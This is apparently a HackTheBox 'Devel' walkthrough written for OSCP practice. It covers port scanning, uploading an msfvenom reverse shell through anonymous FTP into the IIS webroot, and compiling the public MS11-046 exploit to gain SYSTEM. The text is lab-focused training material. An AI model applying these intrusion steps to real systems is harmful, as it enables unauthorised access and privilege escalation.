HackTheBox: Devel [OSCP Prep]
- OS: Windows 💠
- Difficulty: Easy 😇
- Release: 15 Mar 2017 📅
- IP: 10.10.10.5 💻
- Box Creator: ch4p 😎
Hello there guys. Welcome to my 6th post on the TJnull OSCP Prep Series. Today we’re going to be discussing Devel from HackTheBox.
Let’s begin with a full Nmap scan port scan to see what open ports we can find. I’ve used Rustscan because it provides faster Nmap results:
$ rustscan -a 10.10.10.5 -r 1-65535 -- -sV -sC -Pn PORT STATE SERVICE REASON VERSION 21/tcp open ftp syn-ack Microsoft ftpd | ftp-anon: Anonymous FTP login allowed (FTP code 230) | 03-18-17 02:06AM <DIR> aspnet_client | 03-17-17 05:37PM 689 iisstart.htm |_03-17-17 05:37PM 184946 welcome.png | ftp-syst: |_ SYST: Windows_NT 80/tcp open http syn-ack Microsoft IIS httpd 7.5 | http-methods: | Supported Methods: OPTIONS TRACE GET HEAD POST |_ Potentially risky methods: TRACE |_http-server-header: Microsoft-IIS/7.5 |_http-title: IIS7 Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows NSE: Script Post-scanning. NSE: Starting runlevel 1 (of 3) scan. Initiating NSE at 23:05 Completed NSE at 23:05, 0.00s elapsed NSE: Starting runlevel 2 (of 3) scan. Initiating NSE at 23:05 Completed NSE at 23:05, 0.00s elapsed NSE: Starting runlevel 3 (of 3) scan. Initiating NSE at 23:05 Completed NSE at 23:05, 0.00s elapsed Read data files from: /usr/bin/../share/nmap Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 11.97 seconds
I started with FTP cause we have anonymous access. We see some files in the FTP server that are not really useful to us.
Ok, let’s keep the FTP server aside and move on to the HTTP server (port 80) enumeration. Doing a quick dirbust we can identify some files that exactly match the files we found on the FTP server. This made me think the FTP server might infact be the webroot of the webserver. This means we can upload files and execute them via the webserver.
Create a quick shell with msfvenom
Upload to FTP server
Trigger the shell
Get a shell reverse connection.
The first thing I do in privsec is to check if the target system is vulnerable to some sought of kernel exploits, cause that’s an easy win.
C:\Windows\TEMP> systeminfo Host Name: DEVEL OS Name: Microsoft Windows 7 Enterprise OS Version: 6.1.7600 N/A Build 7600 OS Manufacturer: Microsoft Corporation OS Configuration: Standalone Workstation OS Build Type: Multiprocessor Free Registered Owner: babis Registered Organization: Product ID: 55041-051-0948536-86302 Original Install Date: 17/3/2017, 4:17:31 �� System Boot Time: 17/10/2021, 7:37:15 �� System Manufacturer: VMware, Inc. System Model: VMware Virtual Platform System Type: X86-based PC Processor(s): 1 Processor(s) Installed. : x64 Family 23 Model 1 Stepping 2 AuthenticAMD ~2000 Mhz BIOS Version: Phoenix Technologies LTD 6.00, 12/12/2018 Windows Directory: C:\Windows System Directory: C:\Windows\system32 Boot Device: \Device\HarddiskVolume1 System Locale: el;Greek Input Locale: en-us;English (United States) Time Zone: (UTC+02:00) Athens, Bucharest, Istanbul Total Physical Memory: 3.071 MB Available Physical Memory: 2.453 MB Virtual Memory: Max Size: 6.141 MB Virtual Memory: Available: 5.526 MB Virtual Memory: In Use: 615 MB Page File Location(s): C:\pagefile.sys Domain: HTB Logon Server: N/A Hotfix(s): N/A Network Card(s): 1 NIC(s) Installed. : vmxnet3 Ethernet Adapter Connection Name: Local Area Connection 3 DHCP Enabled: No IP address(es) : 10.10.10.5 : fe80::58c0:f1cf:abc6:bb9e : dead:beef::1fc
We see that that the
- OS name => Microsoft Windows 7
- OS version => Build 7600
By using this information we might be able to search for public privsec exploits. I used Google in this case but you can use windows-exploit-suggester, watson.
The target seems to be vulnerable to MS11-046. You can check out the MS11-046 exploit here. It looks like we have to compile it before transferring it to out target. BTW, the compilation details are provided in the exploit source code so that’s cool.
$ sudo apt-get install mingw-w64 $ i686-w64-mingw32-gcc MS11-046.c -o MS11-046.exe -lws2_32
Now we can transfer it to our target.
Now we have system access to our target.
I hope you have learned something valuable by reading my write-up. If you like this post please share it with your fellow hackermates and if you have any questions & suggestions please feel free to post them down in the comments. I’d love to hear and learn from you.
If you enjoyed this write-up show me some ❤️ by giving me some respect 💯 at [email protected] which helps & motivates me to create content like this for the awesome hacking community. Have a great day guys 👋. See you in the next post.